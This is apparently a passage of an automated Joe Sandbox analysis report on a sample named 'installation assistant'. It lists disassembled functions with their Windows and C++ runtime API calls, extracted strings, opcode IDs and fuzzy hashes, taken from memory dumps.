                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction ID: a1796defc2930e5bbb52ecc7c0278740c34a8a629c4f4275fe408d86402a14ae
                              • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction Fuzzy Hash: 4E41A1B29047068FD704CF19C89056AB3F8FF88318F454A2DE95AA7381E331EA25CF91
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction ID: 9ad327cecfbae06ee6d807a6e7bfa0623da2e4bdfae44e0d0817cb07f8fbfe5e
                              • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction Fuzzy Hash: 212148B1A047E707E7209E6DCCD037577D29BC2305F094279DAB08FA87D17A84A2DA64
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction ID: cb723b3fc7dc1ace6ae0df842d4e0cd36431fb0aae7a2ecdea756e9b0c4bb62d
                              • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction Fuzzy Hash: F601D17292462E57DB189F48CC41132B390FB84312F49823ADD479B385E735F870C6C0
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction ID: bbe381b6f08eecb551a6fed07b46fcebfd820872d77ed2b8bf40aba20f6cc6ec
                              • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction Fuzzy Hash: 14E08C72A5223CEBCB25FF88C940D8AF3ECEB45A05B210096B921D3610D270DE01CBE0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                              • API String ID: 3519838083-609671
                              • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction ID: e26f6fa1c38595338be54054cef1d119d22583a6eb6d8355fbdd80603b931767
                              • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction Fuzzy Hash: F6D17D71A0430A9FCB15CFA4D990AEEB7F5FF49308F248519E095A3A50DB71A948CFA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv$H_prolog
                              • String ID: >WJ$x$x
                              • API String ID: 2300968129-3162267903
                              • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction ID: ec74c7db8b13a21f89674b95d4bacb01fc2da8acb8e3e3b24608b82a1a975442
                              • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction Fuzzy Hash: 0F129A719002A9EFCF14DFA4C880AEDBBB5FF48318F209169E859EBA50C7369945CF51
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 6C2E9B07
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6C2E9B0F
                              • _ValidateLocalCookies.LIBCMT ref: 6C2E9B98
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6C2E9BC3
                              • _ValidateLocalCookies.LIBCMT ref: 6C2E9C18
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: 6bdd9f660510de344a2eedfeada6bbb22ace9a9d4c5bcc9ca4b1bfff1a76b284
                              • Instruction ID: b166388873bbd9a55b02600b06f62a566bd95fb7def52606abe1fdd234727178
                              • Opcode Fuzzy Hash: 6bdd9f660510de344a2eedfeada6bbb22ace9a9d4c5bcc9ca4b1bfff1a76b284
                              • Instruction Fuzzy Hash: 6F41A530A1021D9FCF00FF68C840ADEBBB5AF49318F54815AEC25AB791D771DA15CB91
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 0-537541572
                              • Opcode ID: 5dbc27f880a7858317df482651db23013b43e595d8f9e4e862f216647bc5dca6
                              • Instruction ID: d4a0e330a4bc2267d46dfbc7694853d5f567444ae2fc2a43ea1e726a0dd59047
                              • Opcode Fuzzy Hash: 5dbc27f880a7858317df482651db23013b43e595d8f9e4e862f216647bc5dca6
                              • Instruction Fuzzy Hash: 4921CC32A9521EBBEB114729CDC1E0AB668EB06769B150751FC36E7E80D730DD0286E0
                              APIs
                              • GetConsoleCP.KERNEL32(?,6C2FB0D0,?), ref: 6C2FBEF9
                              • __fassign.LIBCMT ref: 6C2FC0D8
                              • __fassign.LIBCMT ref: 6C2FC0F5
                              • WriteFile.KERNEL32(?,6C305AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C2FC13D
                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C2FC17D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C2FC229
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileWrite__fassign$ConsoleErrorLast
                              • String ID:
                              • API String ID: 4031098158-0
                              • Opcode ID: 0f86ff50524d22ab7f69b88b0934380353b419ceec85772f7a47c223be32ea7e
                              • Instruction ID: b3c6f5fba4dfdfbaaba7c62893456c0cc7c1cefa04bbb420ff9b0ca0689e73b5
                              • Opcode Fuzzy Hash: 0f86ff50524d22ab7f69b88b0934380353b419ceec85772f7a47c223be32ea7e
                              • Instruction Fuzzy Hash: 0BD19875E4124D9FDF21DFA8C8809EDFBB5BF49318F28016AE865BB241D731A906CB50
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C1B2F95
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C1B2FAF
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C1B2FD0
                              • __Getctype.LIBCPMT ref: 6C1B3084
                              • std::_Facet_Register.LIBCPMT ref: 6C1B309C
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C1B30B7
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                              • String ID:
                              • API String ID: 1102183713-0
                              • Opcode ID: 86452996cefdb7800b2280c71599e04e24573301199ae2e27f1cb86eeebbdd72
                              • Instruction ID: 876488001967ee90b78b2f627c62c0f0e62c3541edee008969b09e5290fc9747
                              • Opcode Fuzzy Hash: 86452996cefdb7800b2280c71599e04e24573301199ae2e27f1cb86eeebbdd72
                              • Instruction Fuzzy Hash: 644153B2E002188FCB24CF85C854B9AB7B4FF58714F454129D869BBB80EB34A909CF90
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv$__aullrem
                              • String ID:
                              • API String ID: 2022606265-0
                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction ID: 4b297a37ea5f2be0a641bb9044cbb3e584e79da08c405037ef21679ae2b67bcd
                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction Fuzzy Hash: CB219171901219BBDF208E95CC40DDFBA69EF527A8F20C226B52475AD4D2768E50CFB2
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C32A6F1
                                • Part of subcall function 6C339173: __EH_prolog.LIBCMT ref: 6C339178
                              • __EH_prolog.LIBCMT ref: 6C32A8F9
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: IJ$WIJ$J
                              • API String ID: 3519838083-740443243
                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction ID: 7f7674dfb9b42db05ae66d59714917600fb66ea154e7a65f51e65172fcf7d933
                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction Fuzzy Hash: F1719E31904255DFDF18DFA4C440BEDB7B0BF14308F1084A9D895ABB91CB79AA0ACF92
                              APIs
                              • _free.LIBCMT ref: 6C305ADD
                              • _free.LIBCMT ref: 6C305B06
                              • SetEndOfFile.KERNEL32(00000000,6C3046EC,00000000,6C2FB0D0,?,?,?,?,?,?,?,6C3046EC,6C2FB0D0,00000000), ref: 6C305B38
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C3046EC,6C2FB0D0,00000000,?,?,?,?,00000000,?), ref: 6C305B54
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free$ErrorFileLast
                              • String ID: 8Q
                              • API String ID: 1547350101-4022487301
                              • Opcode ID: 7d96aa65850494d770c08c45665ce4d7f86681573fea2e9d5e36e1a5e115d67f
                              • Instruction ID: 9af20e0f4e565ec196727c2b59aa6a5b950f35297b562001192a6674b49f62bc
                              • Opcode Fuzzy Hash: 7d96aa65850494d770c08c45665ce4d7f86681573fea2e9d5e36e1a5e115d67f
                              • Instruction Fuzzy Hash: 4441CA33B40649ABDB019BB8CC82BCE7B79AF49328F140511E864E7B90D735D8454F69
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C33E41D
                                • Part of subcall function 6C33EE40: __EH_prolog.LIBCMT ref: 6C33EE45
                                • Part of subcall function 6C33E8EB: __EH_prolog.LIBCMT ref: 6C33E8F0
                                • Part of subcall function 6C33E593: __EH_prolog.LIBCMT ref: 6C33E598
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: &qB$0aJ$A0$XqB
                              • API String ID: 3519838083-1326096578
                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction ID: e61f8d6abea9ab04b3d33873ebf2851d68d88a28348c7ae7dc39474414c2feec
                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction Fuzzy Hash: 2B217971D05398AECB08DBE4D9859EDBBB4AF25318F204029E45667B81DB781E0CCF62
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C2EF1B4,?,?,6C2EF235,?,?,?), ref: 6C2EF13F
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C2EF152
                              • FreeLibrary.KERNEL32(00000000,?,?,6C2EF1B4,?,?,6C2EF235,?,?,?), ref: 6C2EF175
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: ffc521f1497b691c3fb81d2429bc178d3ae9cecb261593d8e9932ee48e45fc09
                              • Instruction ID: 6410b3b0427898d726cc283e8cd46de3184b9f94f85785bec1868c261c37f4e4
                              • Opcode Fuzzy Hash: ffc521f1497b691c3fb81d2429bc178d3ae9cecb261593d8e9932ee48e45fc09
                              • Instruction Fuzzy Hash: 7DF08C3160151EFFDF02AB94D90AF9F7A7DEB0935AF210060F801B6850CB348E00DB90
                              APIs
                              • __EH_prolog3.LIBCMT ref: 6C2E732E
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C2E7339
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C2E73A7
                                • Part of subcall function 6C2E7230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C2E7248
                              • std::locale::_Setgloballocale.LIBCPMT ref: 6C2E7354
                              • _Yarn.LIBCPMT ref: 6C2E736A
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                              • String ID:
                              • API String ID: 1088826258-0
                              • Opcode ID: cd46a9be0f4a52c637ff6245aec7f8f9a6b38290cc3589753926701f8e04bdf2
                              • Instruction ID: cc226c813334817c7a28bc671df75c39d0d1a78f15c21b19f6f707fc81ecfd5e
                              • Opcode Fuzzy Hash: cd46a9be0f4a52c637ff6245aec7f8f9a6b38290cc3589753926701f8e04bdf2
                              • Instruction Fuzzy Hash: F701BC75A006299BCB45DF60C850ABC37B6FF8E604B55400ADD11A7780CF34AE46CFC1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $!$@
                              • API String ID: 3519838083-2517134481
                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction ID: 464fcd1052c5891a87ac897557b1005749a81b1dc155ac9832449f96aba9fb6e
                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction Fuzzy Hash: F112AF70D11249DFCB04CFA5C480ADDBBB1BF09308F64806AE885ABF59DB31A945CFA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog__aulldiv
                              • String ID: $SJ
                              • API String ID: 4125985754-3948962906
                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction ID: 7fb2c163e415d0a462c15967dc4695982d2726443927a391161c7b8ea1dc38fe
                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction Fuzzy Hash: E1B19E71D002599FCB14CF95C9849EEBBB1FF48318B20852EE45AA7B51C732AA45CF90
                              APIs
                                • Part of subcall function 6C2E7327: __EH_prolog3.LIBCMT ref: 6C2E732E
                                • Part of subcall function 6C2E7327: std::_Lockit::_Lockit.LIBCPMT ref: 6C2E7339
                                • Part of subcall function 6C2E7327: std::locale::_Setgloballocale.LIBCPMT ref: 6C2E7354
                                • Part of subcall function 6C2E7327: _Yarn.LIBCPMT ref: 6C2E736A
                                • Part of subcall function 6C2E7327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C2E73A7
                                • Part of subcall function 6C1B2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C1B2F95
                                • Part of subcall function 6C1B2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C1B2FAF
                                • Part of subcall function 6C1B2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C1B2FD0
                                • Part of subcall function 6C1B2F60: __Getctype.LIBCPMT ref: 6C1B3084
                                • Part of subcall function 6C1B2F60: std::_Facet_Register.LIBCPMT ref: 6C1B309C
                                • Part of subcall function 6C1B2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C1B30B7
                              • std::ios_base::_Addstd.LIBCPMT ref: 6C1B211B
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 3332196525-1866435925
                              • Opcode ID: aa3be50824338dfab74b63f2eba8477ad73dd63bc5e07f08ea9acfe446271731
                              • Instruction ID: b8004dad20ea71f42f35726efd3d615019171114289cfbf0e385cb89d8a020a5
                              • Opcode Fuzzy Hash: aa3be50824338dfab74b63f2eba8477ad73dd63bc5e07f08ea9acfe446271731
                              • Instruction Fuzzy Hash: FF41B0B0E003098FDB04CF64C8457AABBB1FF49318F148268E919AB791E775D989CF90
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C344ECC
                                • Part of subcall function 6C32F58A: __EH_prolog.LIBCMT ref: 6C32F58F
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :hJ$dJ$xJ
                              • API String ID: 3519838083-2437443688
                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction ID: 68d216eacf6b67cb2bb132997cbe193b728d05f9c6c2cc75bbcb1499c1391e92
                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction Fuzzy Hash: 8F21B5B0805B40CFC764CF6AC14428ABBF4BB2A708B10895EC0EA97F11D7B8A609CF55
                              APIs
                              • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C2FB0D0,6C1B1DEA,00008000,6C2FB0D0,?,?,?,6C2FAC7F,6C2FB0D0,?,00000000,6C1B1DEA), ref: 6C2FADC9
                              • GetLastError.KERNEL32(?,?,?,6C2FAC7F,6C2FB0D0,?,00000000,6C1B1DEA,?,6C30469E,6C2FB0D0,000000FF,000000FF,00000002,00008000,6C2FB0D0), ref: 6C2FADD3
                              • __dosmaperr.LIBCMT ref: 6C2FADDA
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
